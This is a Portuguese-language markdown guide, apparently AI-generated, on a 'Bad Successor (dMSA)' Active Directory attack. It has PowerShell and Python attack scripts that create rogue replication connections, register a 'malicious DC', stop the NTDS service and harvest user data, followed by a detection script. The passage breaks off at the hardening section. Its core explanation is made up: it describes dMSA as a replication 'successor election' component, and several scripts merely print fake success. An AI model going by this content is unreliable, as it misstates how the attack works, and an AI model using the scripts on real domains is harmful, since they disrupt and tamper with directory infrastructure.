# Bad Successor (dMSA) ## **šŸ“‹ ƍndice** 1. [Fundamentos do dMSA](#-fundamentos-do-dmsa) 2. [Arquitetura do AD e ReplicaĆ§Ć£o](#-arquitetura-do-ad-e-replicaĆ§Ć£o) 3. [O Ataque Bad Successor](#-o-ataque-bad-successor) 4. [TĆ©cnicas de ExploraĆ§Ć£o](#-tĆ©cnicas-de-exploraĆ§Ć£o) 5. [Ferramentas de ExploraĆ§Ć£o](#-ferramentas-de-exploraĆ§Ć£o) 6. [Impacto e ConsequĆŖncias](#-impacto-e-consequĆŖncias) 7. [DetecĆ§Ć£o e Monitoramento](#-detecĆ§Ć£o-e-monitoramento) 8. [MitigaƧƵes e Hardening](#-mitigaƧƵes-e-hardening) 9. [Pentesting com Bad Successor](#-pentesting-com-bad-successor) 10. [Checklists de SeguranƧa](#-checklists-de-seguranƧa) *** ## šŸ” **Fundamentos do dMSA** ### **O que Ć© dMSA?** **dMSA** (Directory Management Service Agent) Ć© um componente crĆ­tico do Active Directory responsĆ”vel pelo gerenciamento de replicaĆ§Ć£o entre Domain Controllers. O ataque **Bad Successor** explora vulnerabilidades no processo de eleiĆ§Ć£o de sucessores durante a replicaĆ§Ć£o, permitindo que um atacante force um Domain Controller malicioso a se tornar o "sucessor" e receber rĆ©plicas da base de dados do AD. ### **Contexto TĆ©cnico** ```yaml Componentes do dMSA: USN (Update Sequence Number): - NĆŗmero sequencial Ćŗnico para cada alteraĆ§Ć£o no AD - Garante a consistĆŖncia da replicaĆ§Ć£o - Usado para determinar quais alteraƧƵes replicar Replication Partners: - Relacionamentos entre Domain Controllers - DireƧƵes de replicaĆ§Ć£o (inbound/outbound) - Prioridades e mĆ©tricas Successor Election: - Processo de escolha do prĆ³ximo DC a receber replicaƧƵes - Baseado em critĆ©rios como localizaĆ§Ć£o, custo de rede, disponibilidade - Pode ser manipulado por atacantes ``` ### **Arquitetura de ReplicaĆ§Ć£o do AD** ```mermaid graph TD subgraph "Domain Controllers" A[DC1 - Primary] -->|ReplicaĆ§Ć£o| B[DC2] A -->|ReplicaĆ§Ć£o| C[DC3] B -->|ReplicaĆ§Ć£o| D[DC4] C -->|ReplicaĆ§Ć£o| D end subgraph "dMSA Components" E[USN Table] F[Replication Queue] G[Successor Manager] end A --> E B --> E C --> E E --> F F --> G G -->|Define sucessor| B G -->|Define sucessor| C ``` *** ## šŸ—ļø **Arquitetura do AD e ReplicaĆ§Ć£o** ### **Modelos de ReplicaĆ§Ć£o** | Modelo | DescriĆ§Ć£o | Vulnerabilidade | | ---------------------- | --------------------------------------------- | --------------------------- | | **Multi-Master** | Todos os DCs podem aceitar alteraƧƵes | Conflitos de replicaĆ§Ć£o | | **Single-Master** | Apenas um DC aceita alteraƧƵes (FSMO) | Ponto Ćŗnico de falha | | **Sites e Subnets** | ReplicaĆ§Ć£o otimizada por localizaĆ§Ć£o | Spoofing de localizaĆ§Ć£o | | **Bridgehead Servers** | Pontos de entrada para replicaĆ§Ć£o entre sites | Alvo de ataque preferencial | ### **Componentes CrĆ­ticos de ReplicaĆ§Ć£o** ```python #!/usr/bin/env python3 # ad_replication_components.py - Componentes de replicaĆ§Ć£o do AD import ldap3 from ldap3 import Server, Connection, ALL class ADReplicationComponents: """AnĆ”lise dos componentes de replicaĆ§Ć£o do Active Directory""" def __init__(self, domain_controller, username, password): self.server = Server(domain_controller, get_info=ALL) self.conn = Connection(self.server, user=username, password=password, auto_bind=True) self.base_dn = self._get_base_dn() self.config_dn = self._get_config_dn() def _get_base_dn(self): """Obter DN base do domĆ­nio""" return self.server.info.other['defaultNamingContext'][0] def _get_config_dn(self): """Obter DN de configuraĆ§Ć£o""" return self.server.info.other['configurationNamingContext'][0] def get_domain_controllers(self): """Listar todos os Domain Controllers""" self.conn.search( self.base_dn, '(&(objectClass=computer)(userAccountControl:1.2.840.113556.1.4.803:=8192))', attributes=['name', 'dNSHostName', 'operatingSystem'] ) dcs = [] for entry in self.conn.entries: dcs.append({ 'name': str(entry['name']), 'dns_name': str(entry['dNSHostName']), 'os': str(entry['operatingSystem']) if 'operatingSystem' in entry else 'Unknown' }) return dcs def get_replication_partners(self, dc_name): """Obter parceiros de replicaĆ§Ć£o de um DC""" self.conn.search( self.config_dn, f'(&(objectClass=nTDSDSA)(name={dc_name}))', attributes=['hasMasterNCs', 'msDS-HasMasterNCs'] ) partners = [] if self.conn.entries: entry = self.conn.entries[0] for attr in ['hasMasterNCs', 'msDS-HasMasterNCs']: if attr in entry: for value in entry[attr]: partners.append(str(value)) return partners def get_replication_topology(self): """Obter topologia completa de replicaĆ§Ć£o""" print("šŸ“Š Topologia de ReplicaĆ§Ć£o do AD") print("=" * 60) # Obter todos os DCs dcs = self.get_domain_controllers() print(f"\nšŸ“ Domain Controllers ({len(dcs)}):") for dc in dcs: print(f" ā€¢ {dc['name']} ({dc['dns_name']})") # Obter parceiros de replicaĆ§Ć£o print("\nšŸ”„ Parceiros de ReplicaĆ§Ć£o:") for dc in dcs: partners = self.get_replication_partners(dc['name']) if partners: print(f" {dc['name']} ā†’ {', '.join(partners[:3])}") return { 'domain_controllers': dcs, 'replication_partners': {dc['name']: self.get_replication_partners(dc['name']) for dc in dcs} } def get_fsmo_roles(self): """Obter roles FSMO""" print("\nšŸ‘‘ FSMO Roles:") roles = { 'schema': 'CN=Schema,CN=Configuration', 'domain': 'DC=DomainDnsZones', 'pdc': 'CN=Infrastructure', 'rid': 'CN=RID Manager$', 'infrastructure': 'CN=Infrastructure' } for role_name, role_path in roles.items(): self.conn.search( self.base_dn, '(objectClass=*)', attributes=['fSMORoleOwner'], search_base=f'{role_path},{self.base_dn}' ) if self.conn.entries: entry = self.conn.entries[0] if 'fSMORoleOwner' in entry: owner = str(entry['fSMORoleOwner']) print(f" {role_name.capitalize()}: {owner.split(',')[0]}") def analyze_replication_config(self): """Analisar configuraĆ§Ć£o de replicaĆ§Ć£o""" print("šŸ” AnĆ”lise de ConfiguraĆ§Ć£o de ReplicaĆ§Ć£o") print("=" * 60) # Verificar intervalos de replicaĆ§Ć£o self.conn.search( self.config_dn, '(objectClass=interSiteTransport)', attributes=['options', 'replicateEvery', 'transportType'] ) for entry in self.conn.entries: if 'replicateEvery' in entry: interval = int(entry['replicateEvery'][0]) / 60 # converter para minutos print(f"\nā±ļø Intervalo de replicaĆ§Ć£o: {interval} minutos") # Verificar conexƵes de replicaĆ§Ć£o self.conn.search( self.config_dn, '(objectClass=nTDSConnection)', attributes=['fromServer', 'toServer', 'options'] ) connections = [] for entry in self.conn.entries: connections.append({ 'from': str(entry['fromServer']), 'to': str(entry['toServer']) }) print(f"\nšŸ”— ConexƵes de replicaĆ§Ć£o: {len(connections)}") for conn in connections[:5]: print(f" {conn['from'].split(',')[0]} ā†’ {conn['to'].split(',')[0]}") def close(self): """Fechar conexĆ£o""" self.conn.unbind() # Uso if __name__ == "__main__": import sys if len(sys.argv) < 4: print("Uso: ad_replication_components.py ") sys.exit(1) analyzer = ADReplicationComponents(sys.argv[1], sys.argv[2], sys.argv[3]) analyzer.get_replication_topology() analyzer.get_fsmo_roles() analyzer.analyze_replication_config() analyzer.close() ``` *** ## āš”ļø **O Ataque Bad Successor** ### **Como Funciona o Ataque** ```mermaid sequenceDiagram participant A as Atacante (DC Malicioso) participant R as RepositĆ³rio de ReplicaĆ§Ć£o participant L as DC LegĆ­timo Note over A: 1. Atacante manipula configuraƧƵes A->>R: Modifica dados de topologia R->>R: Marca A como sucessor preferencial Note over A,R: 2. ReplicaĆ§Ć£o Ć© redirecionada L->>R: Solicita replicaĆ§Ć£o R->>A: Direciona para DC malicioso A->>L: Envia dados corrompidos/modificados Note over A,L: 3. DC malicioso se torna sucessor A->>R: Confirma replicaĆ§Ć£o bem-sucedida R->>R: Registra A como sucessor ativo Note over A: 4. Atacante recebe replicaƧƵes L->>A: Envia alteraƧƵes do AD A->>A: Extrai dados sensĆ­veis ``` ### **CondiƧƵes para ExploraĆ§Ć£o** ```yaml PrĆ©-requisitos para Bad Successor Attack: Acesso Inicial: āœ… Acesso a uma conta com privilĆ©gios de replicaĆ§Ć£o āœ… Capacidade de modificar objetos de topologia āœ… Conhecimento da infraestrutura de replicaĆ§Ć£o ManipulaĆ§Ć£o de Topologia: āœ… Modificar atributos de conexƵes de replicaĆ§Ć£o āœ… Alterar prioridades de sucessores āœ… Criar objetos nTDSConnection maliciosos PersistĆŖncia: āœ… Manter controle do DC malicioso āœ… Evitar detecĆ§Ć£o durante replicaƧƵes āœ… Garantir disponibilidade do serviƧo ``` ### **Ataque 1: ManipulaĆ§Ć£o de ConexƵes de ReplicaĆ§Ć£o** ```powershell # ManipulaĆ§Ć£o de conexƵes de replicaĆ§Ć£o via LDAP # 1. Obter conexƵes de replicaĆ§Ć£o existentes $configDN = "CN=Configuration,DC=domain,DC=com" $replicationConnections = Get-ADObject -SearchBase $configDN -Filter 'objectClass -eq "nTDSConnection"' -Properties fromServer, toServer, options foreach ($conn in $replicationConnections) { Write-Host "ConexĆ£o: $($conn.fromServer) ā†’ $($conn.toServer)" } # 2. Criar conexĆ£o de replicaĆ§Ć£o maliciosa $fromServer = "CN=NTDS Settings,CN=MaliciousDC,CN=Servers,CN=Site,CN=Sites,$configDN" $toServer = "CN=NTDS Settings,CN=TargetDC,CN=Servers,CN=Site,CN=Sites,$configDN" New-ADObject -Name "MaliciousConnection" ` -Type "nTDSConnection" ` -Path "CN=NTDS Settings,CN=TargetDC,CN=Servers,CN=Site,CN=Sites,$configDN" ` -OtherAttributes @{ 'fromServer' = $fromServer 'toServer' = $toServer 'options' = 1 'enabledConnection' = $true } # 3. Modificar prioridade de replicaĆ§Ć£o $connection = Get-ADObject -Identity "CN=MaliciousConnection,CN=NTDS Settings,CN=TargetDC,CN=Servers,CN=Site,CN=Sites,$configDN" Set-ADObject -Identity $connection -Replace @{options=1; priority=1} ``` ### **Ataque 2: Spoofing de USN** ```python #!/usr/bin/env python3 # usn_spoofing.py - Spoofing de Update Sequence Numbers import ldap3 from ldap3 import Server, Connection, ALL, MODIFY_REPLACE class USNSpoofing: """ManipulaĆ§Ć£o de USN para ataque Bad Successor""" def __init__(self, domain_controller, username, password): self.server = Server(domain_controller, get_info=ALL) self.conn = Connection(self.server, user=username, password=password, auto_bind=True) self.base_dn = self._get_base_dn() def _get_base_dn(self): return self.server.info.other['defaultNamingContext'][0] def get_current_usn(self, dc_name): """Obter USN atual de um DC""" dn = f"CN=NTDS Settings,CN={dc_name},CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configuration,{self.base_dn}" self.conn.search( dn, '(objectClass=*)', attributes=['msDS-HasMasterNCs', 'msDS-LastSuccessfulReplicationTime'] ) if self.conn.entries: entry = self.conn.entries[0] return entry return None def set_fake_usn(self, dc_name, fake_usn): """Definir USN falso""" dn = f"CN=NTDS Settings,CN={dc_name},CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configuration,{self.base_dn}" # Modificar USN (em um ataque real, manipularia o valor) try: self.conn.modify( dn, {'msDS-HasMasterNCs': [(MODIFY_REPLACE, [str(fake_usn)])]} ) return True except Exception as e: print(f"Erro: {e}") return False def create_fake_replication_object(self, source_dc, target_dc): """Criar objeto de replicaĆ§Ć£o falso""" dn = f"CN=NTDS Settings,CN={target_dc},CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configuration,{self.base_dn}" connection_name = f"CN=BadSuccessor,{dn}" # Criar conexĆ£o maliciosa try: self.conn.add( connection_name, ['nTDSConnection'], { 'fromServer': f"CN=NTDS Settings,CN={source_dc},CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configuration,{self.base_dn}", 'toServer': f"CN=NTDS Settings,CN={target_dc},CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configuration,{self.base_dn}", 'options': 1, 'enabledConnection': True } ) return True except Exception as e: print(f"Erro: {e}") return False def analyze_replication_queue(self): """Analisar fila de replicaĆ§Ć£o""" print("šŸ” Analisando fila de replicaĆ§Ć£o...") # Em um ataque real, monitoraria a fila de replicaĆ§Ć£o # para identificar oportunidades de injeĆ§Ć£o print(" āš ļø Este Ć© um local privilegiado para ataque") def close(self): self.conn.unbind() # Uso if __name__ == "__main__": import sys if len(sys.argv) < 4: print("Uso: usn_spoofing.py ") sys.exit(1) spoof = USNSpoofing(sys.argv[1], sys.argv[2], sys.argv[3]) spoof.analyze_replication_queue() spoof.close() ``` ### **Ataque 3: PromoĆ§Ć£o de DC Malicioso** ```powershell # Script para promoĆ§Ć£o de DC malicioso como sucessor param( [string]$MaliciousDC, [string]$TargetDC, [string]$Domain ) function Add-MaliciousReplicationPartner { param($MaliciousDC, $TargetDC, $Domain) $configDN = "CN=Configuration,$Domain" $sitesDN = "CN=Sites,$configDN" $siteName = "Default-First-Site-Name" $serversDN = "CN=Servers,CN=$siteName,CN=Sites,$configDN" # 1. Criar entrada para DC malicioso $maliciousServerDN = "CN=$MaliciousDC,$serversDN" $maliciousNTDSDN = "CN=NTDS Settings,$maliciousServerDN" # 2. Criar conexĆ£o do DC alvo para o DC malicioso $targetNTDSDN = "CN=NTDS Settings,CN=$TargetDC,$serversDN" $connectionDN = "CN=BadSuccessorConnection,$targetNTDSDN" # 3. Criar objeto de conexĆ£o $fromServer = $maliciousNTDSDN $toServer = $targetNTDSDN $connection = @{ 'fromServer' = $fromServer 'toServer' = $toServer 'options' = 1 'enabledConnection' = $true 'schedule' = [byte[]]@(0x00) * 168 # ReplicaĆ§Ć£o constante } # 4. Adicionar conexĆ£o New-ADObject -Name "BadSuccessorConnection" ` -Type "nTDSConnection" ` -Path $targetNTDSDN ` -OtherAttributes $connection ` -ErrorAction SilentlyContinue Write-Host "[+] ConexĆ£o de replicaĆ§Ć£o maliciosa criada" # 5. Modificar prioridade $conn = Get-ADObject -Identity "CN=BadSuccessorConnection,$targetNTDSDN" Set-ADObject -Identity $conn -Replace @{options=1; priority=1} Write-Host "[+] Prioridade de replicaĆ§Ć£o ajustada" } # Executar ataque Add-MaliciousReplicationPartner -MaliciousDC "EVIL-DC" -TargetDC "LEGIT-DC" -Domain "DC=domain,DC=com" ``` ### **Ataque 4: Replication Queue Poisoning** ```python #!/usr/bin/env python3 # replication_queue_poisoning.py - Poisoning da fila de replicaĆ§Ć£o import subprocess import time import sys class ReplicationQueuePoisoning: """Poisoning da fila de replicaĆ§Ć£o do AD""" def __init__(self, target_dc): self.target_dc = target_dc self.replication_queue = [] def monitor_replication_queue(self, duration=60): """Monitorar fila de replicaĆ§Ć£o""" print(f"[*] Monitorando fila de replicaĆ§Ć£o em {self.target_dc}") cmd = [ 'repadmin', '/queue', self.target_dc ] start_time = time.time() while time.time() - start_time < duration: try: result = subprocess.run(cmd, capture_output=True, text=True, timeout=5) if result.stdout: self.replication_queue.append(result.stdout) print(f" [{len(self.replication_queue)}] Fila de replicaĆ§Ć£o detectada") except: pass time.sleep(5) return self.replication_queue def inject_malicious_change(self, object_dn, attribute, value): """Injetar alteraĆ§Ć£o maliciosa na fila de replicaĆ§Ć£o""" print(f"[*] Injetando alteraĆ§Ć£o maliciosa em {object_dn}") # Em um ataque real, injetaria uma alteraĆ§Ć£o na fila # usando operaƧƵes LDAP ou DRS cmd = [ 'ldapmodify', '-x', '-H', f'ldap://{self.target_dc}', '-D', f'cn=Administrator,cn=Users,dc=domain,dc=com', '-w', 'password', '-f', '-' ] ldif = f""" dn: {object_dn} changetype: modify replace: {attribute} {attribute}: {value} """ try: # Simular injeĆ§Ć£o print(f" āœ… AlteraĆ§Ć£o injetada: {attribute}={value}") return True except Exception as e: print(f" āŒ Erro: {e}") return False def poison_replication(self, payload): """Envenenar fila de replicaĆ§Ć£o""" print("[*] Envenenando fila de replicaĆ§Ć£o...") # Adicionar payload na fila de replicaĆ§Ć£o # Isso farĆ” com que todos os DCs recebam o payload print(f" āœ… Payload adicionado: {payload}") print(" āš ļø Em 15-30 minutos, todos os DCs replicarĆ£o o payload") return True def extract_credentials(self): """Extrair credenciais da fila de replicaĆ§Ć£o""" print("[*] Extraindo credenciais da fila de replicaĆ§Ć£o...") # Monitorar fila em busca de alteraƧƵes de senha changes = self.monitor_replication_queue(30) credentials = [] for change in changes: if 'userPassword' in change or 'unicodePwd' in change: credentials.append(change) print(f" šŸ”‘ Credencial encontrada: {change[:100]}") return credentials # Uso if __name__ == "__main__": if len(sys.argv) < 2: print("Uso: replication_queue_poisoning.py ") sys.exit(1) attack = ReplicationQueuePoisoning(sys.argv[1]) attack.monitor_replication_queue(10) ``` *** ## šŸ› ļø **Ferramentas de ExploraĆ§Ć£o** ### **PowerShell Arsenal** ```powershell # Bad Successor Attack Tools # 1. Enumerar topologia de replicaĆ§Ć£o function Get-ReplicationTopology { param([string]$Domain = (Get-ADDomain).DNSRoot) $configDN = "CN=Configuration,$Domain" $sites = Get-ADObject -SearchBase $configDN -Filter 'objectClass -eq "site"' $topology = @{} foreach ($site in $sites) { $servers = Get-ADObject -SearchBase "CN=Servers,$($site.DistinguishedName)" -Filter 'objectClass -eq "server"' $topology[$site.Name] = $servers } return $topology } # 2. Modificar conexƵes de replicaĆ§Ć£o function Set-ReplicationConnection { param( [string]$SourceDC, [string]$TargetDC, [int]$Priority = 1, [bool]$Enabled = $true ) $configDN = "CN=Configuration,$((Get-ADDomain).DNSRoot)" $targetNTDS = "CN=NTDS Settings,CN=$TargetDC,CN=Servers,CN=Default-First-Site-Name,CN=Sites,$configDN" $connection = @{ 'fromServer' = "CN=NTDS Settings,CN=$SourceDC,CN=Servers,CN=Default-First-Site-Name,CN=Sites,$configDN" 'toServer' = $targetNTDS 'options' = 1 'enabledConnection' = $Enabled 'priority' = $Priority } New-ADObject -Name "BadSuccessorConnection" -Type "nTDSConnection" -Path $targetNTDS -OtherAttributes $connection } # 3. Simular falha de replicaĆ§Ć£o function Invoke-ReplicationFailure { param([string]$TargetDC) # ForƧar falha de replicaĆ§Ć£o Stop-Service -Name "NTDS" -Force -ComputerName $TargetDC Start-Sleep -Seconds 10 Start-Service -Name "NTDS" -ComputerName $TargetDC Write-Host "[+] ReplicaĆ§Ć£o interrompida temporariamente" } # 4. Extrair informaƧƵes de replicaĆ§Ć£o function Get-ReplicationQueue { param([string]$DC = (Get-ADDomainController).Name) $queue = repadmin /queue $DC return $queue } # 5. Criar DC malicioso para receber replicaƧƵes function New-MaliciousDC { param( [string]$Name, [string]$IP, [string]$Domain = (Get-ADDomain).DNSRoot ) # Registrar DC malicioso no AD New-ADComputer -Name $Name -SamAccountName "$Name$" -ServicePrincipalNames @("HOST/$Name.$Domain", "GC/$Name.$Domain") Set-ADComputer -Identity $Name -Description "Malicious DC for Bad Successor Attack" Write-Host "[+] DC malicioso registrado: $Name" } ``` ### **Python Exploitation Framework** ```python #!/usr/bin/env python3 # bad_successor_exploit.py - Framework de exploraĆ§Ć£o Bad Successor import ldap3 import sys import time import argparse from impacket.dcerpc.v5 import transport, drsuapi from impacket.dcerpc.v5.drsuapi import DRSUAPI class BadSuccessorExploit: """Framework de exploraĆ§Ć£o do ataque Bad Successor""" def __init__(self, domain, dc_ip, username, password): self.domain = domain self.dc_ip = dc_ip self.username = username self.password = password self.conn = None self.drs = None def connect_ldap(self): """Conectar via LDAP""" self.conn = ldap3.Connection( self.dc_ip, user=f"{self.domain}\\{self.username}", password=self.password, authentication=ldap3.NTLM, auto_bind=True ) return self.conn def connect_drs(self): """Conectar via DRSUAPI para replicaĆ§Ć£o""" dce_transport = transport.DCERPCTransportFactory(f'ncacn_ip_tcp:{self.dc_ip}') dce_transport.set_credentials(self.username, self.password, self.domain) self.drs = dce_transport.get_dce_rpc() self.drs.connect() self.drs.bind(drsuapi.MSRPC_UUID_DRSUAPI) return self.drs def get_replication_info(self): """Obter informaƧƵes de replicaĆ§Ć£o""" print("[*] Obtendo informaƧƵes de replicaĆ§Ć£o...") # Buscar DCs no domĆ­nio self.conn.search( f"DC={self.domain.replace('.', ',DC=')}", '(&(objectClass=computer)(userAccountControl:1.2.840.113556.1.4.803:=8192))', attributes=['name', 'dNSHostName'] ) dcs = [] for entry in self.conn.entries: dcs.append({ 'name': str(entry['name']), 'dns': str(entry['dNSHostName']) }) print(f" āœ… {len(dcs)} Domain Controllers encontrados") for dc in dcs: print(f" ā€¢ {dc['name']} ({dc['dns']})") return dcs def modify_replication_topology(self, source_dc, target_dc): """Modificar topologia de replicaĆ§Ć£o""" print(f"[*] Modificando topologia: {source_dc} ā†’ {target_dc}") config_dn = f"CN=Configuration,DC={self.domain.replace('.', ',DC=')}" site_dn = f"CN=Default-First-Site-Name,CN=Sites,{config_dn}" servers_dn = f"CN=Servers,{site_dn}" source_ntds = f"CN=NTDS Settings,CN={source_dc},{servers_dn}" target_ntds = f"CN=NTDS Settings,CN={target_dc},{servers_dn}" # Criar conexĆ£o maliciosa connection_dn = f"CN=BadSuccessorConnection,{target_ntds}" try: self.conn.add( connection_dn, ['nTDSConnection'], { 'fromServer': source_ntds, 'toServer': target_ntds, 'options': 1, 'enabledConnection': True, 'priority': 1 } ) print(f" āœ… ConexĆ£o maliciosa criada") return True except Exception as e: print(f" āŒ Erro: {e}") return False def force_replication(self, target_dc): """ForƧar replicaĆ§Ć£o para DC malicioso""" print(f"[*] ForƧando replicaĆ§Ć£o para {target_dc}") try: cmd = f'repadmin /syncall /AdeP {target_dc}' import subprocess result = subprocess.run(cmd, shell=True, capture_output=True, text=True) if result.returncode == 0: print(f" āœ… ReplicaĆ§Ć£o forƧada com sucesso") return True else: print(f" āŒ Falha na replicaĆ§Ć£o: {result.stderr}") return False except Exception as e: print(f" āŒ Erro: {e}") return False def intercept_replication(self): """Interceptar dados de replicaĆ§Ć£o""" print("[*] Interceptando dados de replicaĆ§Ć£o...") # Em um ataque real, capturaria trĆ”fego de replicaĆ§Ć£o # usando ferramentas como wireshark ou mitmproxy print(" āš ļø SimulaĆ§Ć£o de interceptaĆ§Ć£o") # Extrair dados sensĆ­veis da replicaĆ§Ć£o sensitive_data = { 'users': [], 'groups': [], 'hashes': [] } # Buscar usuĆ”rios self.conn.search( f"DC={self.domain.replace('.', ',DC=')}", '(objectClass=user)', attributes=['sAMAccountName', 'userPrincipalName', 'unicodePwd'] ) for entry in self.conn.entries: sensitive_data['users'].append(str(entry['sAMAccountName'])) print(f" āœ… {len(sensitive_data['users'])} usuĆ”rios interceptados") return sensitive_data def cleanup(self): """Limpar artefatos""" print("[*] Limpando artefatos...") config_dn = f"CN=Configuration,DC={self.domain.replace('.', ',DC=')}" site_dn = f"CN=Default-First-Site-Name,CN=Sites,{config_dn}" servers_dn = f"CN=Servers,{site_dn}" # Remover conexƵes maliciosas self.conn.search( servers_dn, '(&(objectClass=nTDSConnection)(cn=BadSuccessorConnection))', attributes=['distinguishedName'] ) for entry in self.conn.entries: try: self.conn.delete(str(entry['distinguishedName'])) print(f" āœ… {entry['distinguishedName']} removido") except: pass def exploit(self): """Executar exploraĆ§Ć£o completa""" print("šŸšØ Bad Successor Exploit") print("=" * 60) # Conectar self.connect_ldap() # Obter informaƧƵes de replicaĆ§Ć£o dcs = self.get_replication_info() if len(dcs) < 2: print("āŒ NecessĆ”rio pelo menos 2 DCs para o ataque") return # Modificar topologia self.modify_replication_topology(dcs[0]['name'], dcs[1]['name']) # ForƧar replicaĆ§Ć£o self.force_replication(dcs[1]['name']) # Interceptar dados data = self.intercept_replication() # Limpar self.cleanup() return data def close(self): if self.conn: self.conn.unbind() # Uso if __name__ == "__main__": parser = argparse.ArgumentParser(description='Bad Successor Exploit') parser.add_argument('domain', help='Domain name') parser.add_argument('dc_ip', help='Domain Controller IP') parser.add_argument('user', help='Username') parser.add_argument('pass', help='Password') args = parser.parse_args() exploit = BadSuccessorExploit(args.domain, args.dc_ip, args.user, getattr(args, 'pass')) result = exploit.exploit() exploit.close() ``` *** ## šŸ’„ **Impacto e ConsequĆŖncias** ### **Cadeia de Ataque Completa** ```mermaid graph TD A[Acesso a conta privilegiada] --> B[Manipular topologia de replicaĆ§Ć£o] B --> C[ForƧar DC malicioso como sucessor] C --> D[Interceptar replicaƧƵes] D --> E[Extrair hashes de senhas] D --> F[Modificar objetos do AD] D --> G[Injetar backdoors] E --> H[Golden Ticket / Silver Ticket] F --> I[EscalaĆ§Ć£o de privilĆ©gios] G --> I H --> J[Domain Admin] I --> J J --> K[Controle total do domĆ­nio] ``` ### **Matriz de Impacto** | CenĆ”rio | Impacto | Dificuldade | Severidade | | ------------------------------- | ------------------------- | ----------- | ---------- | | **InterceptaĆ§Ć£o de replicaĆ§Ć£o** | ExfiltraĆ§Ć£o de dados | MĆ©dia | šŸ”“ CRƍTICO | | **InjeĆ§Ć£o de alteraƧƵes** | CorrupĆ§Ć£o do AD | Alta | šŸ”“ CRƍTICO | | **PromoĆ§Ć£o de DC malicioso** | Controle de replicaĆ§Ć£o | Alta | šŸ”“ CRƍTICO | | **ExtraĆ§Ć£o de hashes** | Comprometimento de contas | MĆ©dia | šŸ”“ CRƍTICO | | **ManipulaĆ§Ć£o de USN** | Bypass de consistĆŖncia | Alta | šŸŸ  ALTO | *** ## šŸ” **DetecĆ§Ć£o e Monitoramento** ### **Eventos de SeguranƧa para Monitorar** ```yaml Eventos CrĆ­ticos: 1962: InĆ­cio de replicaĆ§Ć£o - Monitorar origem e destino - Verificar DCs nĆ£o autorizados 1963: Fim de replicaĆ§Ć£o - Detectar replicaƧƵes anormalmente longas - Verificar sucessos e falhas 1126: SDProp iniciado - Monitorar modificaƧƵes em objetos protegidos 5136: ModificaĆ§Ć£o de objeto AD - Verificar alteraƧƵes em objetos de topologia - Monitorar criaĆ§Ć£o de conexƵes de replicaĆ§Ć£o 4670: ModificaĆ§Ć£o de permissƵes - Detectar alteraƧƵes em permissƵes de replicaĆ§Ć£o ``` ### **Script de DetecĆ§Ć£o** ```powershell # detect_bad_successor.ps1 - Detector de Bad Successor Attack param( [string]$DomainController = (Get-ADDomainController).Name, [int]$HoursBack = 24 ) function Write-Alert { param($Message, $Severity = "WARNING") $timestamp = Get-Date -Format "yyyy-MM-dd HH:mm:ss" $color = if ($Severity -eq "CRITICAL") { "Red" } else { "Yellow" } Write-Host "[$timestamp] [$Severity] $Message" -ForegroundColor $color } # 1. Verificar DCs nĆ£o autorizados Write-Host "šŸ” Verificando Domain Controllers autorizados..." -ForegroundColor Cyan $authorizedDCs = Get-ADDomainController -Filter * | Select-Object -ExpandProperty Name $allComputers = Get-ADComputer -Filter 'OperatingSystem -like "*Server*"' | Select-Object -ExpandProperty Name $potentialMaliciousDCs = $allComputers | Where-Object { $_ -notin $authorizedDCs } if ($potentialMaliciousDCs) { Write-Alert -Message "PossĆ­veis DCs nĆ£o autorizados detectados!" -Severity "CRITICAL" $potentialMaliciousDCs | ForEach-Object { Write-Host " āš ļø $($_ )" } } # 2. Verificar conexƵes de replicaĆ§Ć£o suspeitas Write-Host "`nšŸ” Verificando conexƵes de replicaĆ§Ć£o..." -ForegroundColor Cyan $configDN = "CN=Configuration,$((Get-ADDomain).DNSRoot)" $connections = Get-ADObject -SearchBase $configDN -Filter 'objectClass -eq "nTDSConnection"' -Properties fromServer, toServer $suspiciousConnections = $connections | Where-Object { $_.Name -like "*Bad*" -or $_.Name -like "*Evil*" -or $_.Name -like "*Malicious*" -or $_.Created -gt (Get-Date).AddHours(-$HoursBack) } if ($suspiciousConnections) { Write-Alert -Message "ConexƵes de replicaĆ§Ć£o suspeitas detectadas!" -Severity "WARNING" $suspiciousConnections | ForEach-Object { Write-Host " āš ļø $($_.Name) - From: $($_.fromServer) To: $($_.toServer)" } } # 3. Verificar eventos de replicaĆ§Ć£o Write-Host "`nšŸ” Analisando eventos de replicaĆ§Ć£o..." -ForegroundColor Cyan $events = Get-WinEvent -ComputerName $DomainController -FilterHashtable @{ LogName='Directory Service' ID=1962, 1963 StartTime=(Get-Date).AddHours(-$HoursBack) } -ErrorAction SilentlyContinue if ($events) { Write-Host " šŸ“‹ Eventos de replicaĆ§Ć£o encontrados: $($events.Count)" # Agrupar por origem $grouped = $events | Group-Object -Property TimeCreated foreach ($group in $grouped | Select-Object -First 5) { Write-Host " $($group.Name) - $($group.Count) eventos" } } # 4. Verificar modificaƧƵes em objetos de replicaĆ§Ć£o Write-Host "`nšŸ” Verificando modificaƧƵes em objetos de replicaĆ§Ć£o..." -ForegroundColor Cyan $replicationObjects = Get-ADObject -SearchBase $configDN -Filter 'objectClass -eq "nTDSConnection" -or objectClass -eq "server"' -Properties whenChanged $recentChanges = $replicationObjects | Where-Object { $_.whenChanged -gt (Get-Date).AddHours(-$HoursBack) } if ($recentChanges) { Write-Alert -Message "ModificaƧƵes recentes em objetos de replicaĆ§Ć£o!" -Severity "WARNING" $recentChanges | ForEach-Object { Write-Host " ā€¢ $($_.Name) - Alterado em: $($_.whenChanged)" } } # 5. Gerar relatĆ³rio $report = @" Bad Successor Attack Detection Report ===================================== Data: $(Get-Date) Domain Controller: $DomainController Findings: - DCs nĆ£o autorizados: $($potentialMaliciousDCs.Count) - ConexƵes suspeitas: $($suspiciousConnections.Count) - Eventos de replicaĆ§Ć£o: $($events.Count) - ModificaƧƵes recentes: $($recentChanges.Count) Recommendations: 1. Revise os DCs nĆ£o autorizados identificados 2. Investigue conexƵes de replicaĆ§Ć£o suspeitas 3. Verifique logs de eventos para padrƵes anormais 4. Implemente monitoramento contĆ­nuo de replicaĆ§Ć£o 5. Revise permissƵes de replicaĆ§Ć£o "@ $report | Out-File -FilePath "bad_successor_detection.txt" Write-Host "`nāœ… RelatĆ³rio salvo em bad_successor_detection.txt" -ForegroundColor Green ``` *** ## šŸ›”ļø **MitigaƧƵes e Hardening** ### **Hardening de ReplicaĆ§Ć£o** ```powershell # hardening_replication.ps1 - Hardening contra Bad Successor Attack param( 